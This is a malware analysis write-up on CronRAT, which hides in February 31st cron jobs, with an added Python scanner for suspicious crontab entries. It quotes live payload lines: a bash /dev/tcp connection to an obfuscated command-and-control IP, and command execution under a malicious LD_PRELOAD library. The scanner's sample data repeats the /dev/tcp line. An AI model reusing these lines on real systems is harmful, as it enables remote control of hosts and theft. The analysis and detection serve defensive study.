CronRAT malware hides behind February 31st
by Sansec Forensics Team
November 24, 2021
https://sansec.io/research/cronrat
CronRAT is Linux malware that Sansec found on several online stores around Black Friday 2020. It is classified as a Remote Access Trojan (RAT). In many of these cases, payment skimmers (Magecart) were also found on the impacted hosts.
CronRAT achieves persistence by hiding malicious jobs in the cron service scheduled for February 31st, a date that does not exist on any calendar. These jobs deliver a payload that is encoded in multiple layers, such as base64 and gzip.
A decoded copy of the cron payload, written in bash, can be found here: https://gist.github.com/gwillem/fbe3e6b98e2e10d7f1f271ca4b6e813f
This sample uses the /dev/tcp feature of bash to open a socket, much as netcat would, and obfuscates the command-and-control IP address by writing it as a single decimal integer (the port is written in hex).
eval "exec ${O56}<>/dev/tcp/796077735/$((0x1bb))" &>/dev/null || O85 5
daniel@wildcat ~ % python3
Python 3.8.10 (default, Jul 29 2024, 17:02:10)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import socket, struct
>>> socket.inet_ntoa(struct.pack("!L", 796077735))
'47.115.46.167'
>>> 0x1bb
443
Deobfuscated 796077735 to 47.115.46.167, an IP address belonging to Alibaba.
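The same decoding, turned into a small defensive check, as an added example that is not part of the Sansec write-up: it walks crontab lines, flags schedules whose day-of-month can never occur in the given month (February 31st included), decodes /dev/tcp endpoints written as decimal or hex, and notes LD_PRELOAD in a cron command. The sample crontab lines are constructed for the example; only the decimal address and hex port come from the page.

```python
import re
import socket
import struct
from calendar import monthrange

# Constructed sample crontab (not from the Sansec page). The /dev/tcp
# endpoint reuses the decimal IP and hex port shown in the article.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
52 23 31 2 * /var/tmp/.x/run.sh
15 4 31 4 * /bin/sh -c 'eval "exec 3<>/dev/tcp/796077735/$((0x1bb))"'
*/5 * * * * env LD_PRELOAD=/var/tmp/.x/hook.so /usr/bin/true
30 1 30 6 * /usr/local/bin/backup.sh
"""

# Host part up to the next slash, port as a literal or bash arithmetic $((0x..)).
DEV_TCP_RE = re.compile(r"/dev/tcp/([^/\s]+)/(\$\(\(0x[0-9a-fA-F]+\)\)|\d+)")


def impossible_date(dom_field, mon_field):
    """True when a numeric day-of-month/month pair can never occur.

    Wildcards, ranges and lists are not judged (returns False) because they
    may still match a real date; only plain numeric fields are checked.
    """
    if not (dom_field.isdigit() and mon_field.isdigit()):
        return False
    dom, mon = int(dom_field), int(mon_field)
    if not 1 <= mon <= 12 or not 1 <= dom <= 31:
        return True
    # Evaluate against a leap year so February 29th counts as possible.
    return dom > monthrange(2000, mon)[1]


def decode_ip(token):
    """Decode the host part of a /dev/tcp path: dotted quad, decimal or hex."""
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", token):
        return token
    if re.fullmatch(r"0x[0-9a-fA-F]+", token):
        n = int(token, 16)
    elif token.isdigit():
        n = int(token)
    else:
        return None
    if n > 0xFFFFFFFF:
        return None
    return socket.inet_ntoa(struct.pack("!L", n))


def decode_port(token):
    """Decode a port written as a literal or as bash arithmetic $((0x1bb))."""
    m = re.fullmatch(r"\$\(\((0x[0-9a-fA-F]+)\)\)", token)
    return int(m.group(1), 16) if m else int(token)


def scan_crontab(text):
    """Return one finding per suspicious cron entry.

    A finding carries the raw line, the reasons it was flagged and the
    decoded (ip, port) tuple when a /dev/tcp endpoint was present.
    """
    findings = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split(None, 5)
        if len(fields) < 6:
            continue
        _minute, _hour, dom, mon, _dow, command = fields
        reasons = []
        endpoint = None
        if impossible_date(dom, mon):
            reasons.append(f"impossible date: day {dom} of month {mon}")
        m = DEV_TCP_RE.search(command)
        if m:
            endpoint = (decode_ip(m.group(1)), decode_port(m.group(2)))
            reasons.append(f"/dev/tcp connection to {endpoint[0]}:{endpoint[1]}")
        if "LD_PRELOAD=" in command:
            reasons.append("LD_PRELOAD set in cron command")
        if reasons:
            findings.append({"line": stripped, "reasons": reasons, "endpoint": endpoint})
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f["line"])
        for r in f["reasons"]:
            print("   ", r)
```

Run it against the output of `crontab -l` for each user and the files under /etc/cron.d to triage; the impossible-date check is the cheap signal, the decoded endpoint is what you hand to network blocking.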
The command and control server is implemented with a custom protocol, masquerades as a Dropbear SSH server by sending a bogus banner string to new connections, has self-destruct functionality, and runs commands sent by the C2 server with a malicious LD_PRELOAD library loaded:
O24=$(cd "${O33}" && O75 env "${O0}"="${O40}" LD_PRELOAD=${O57} "${O42}" "${O47}" 1>&2 & O84 "${O57}")
To gain additional insight into this malware, the Sansec researchers developed a custom version of CronRAT that joined the attacker's command and control server and waited for commands. Eventually, the attacker sent NginRAT to the pseudo-infected host, as outlined in this blog post: https://sansec.io/research/nginrat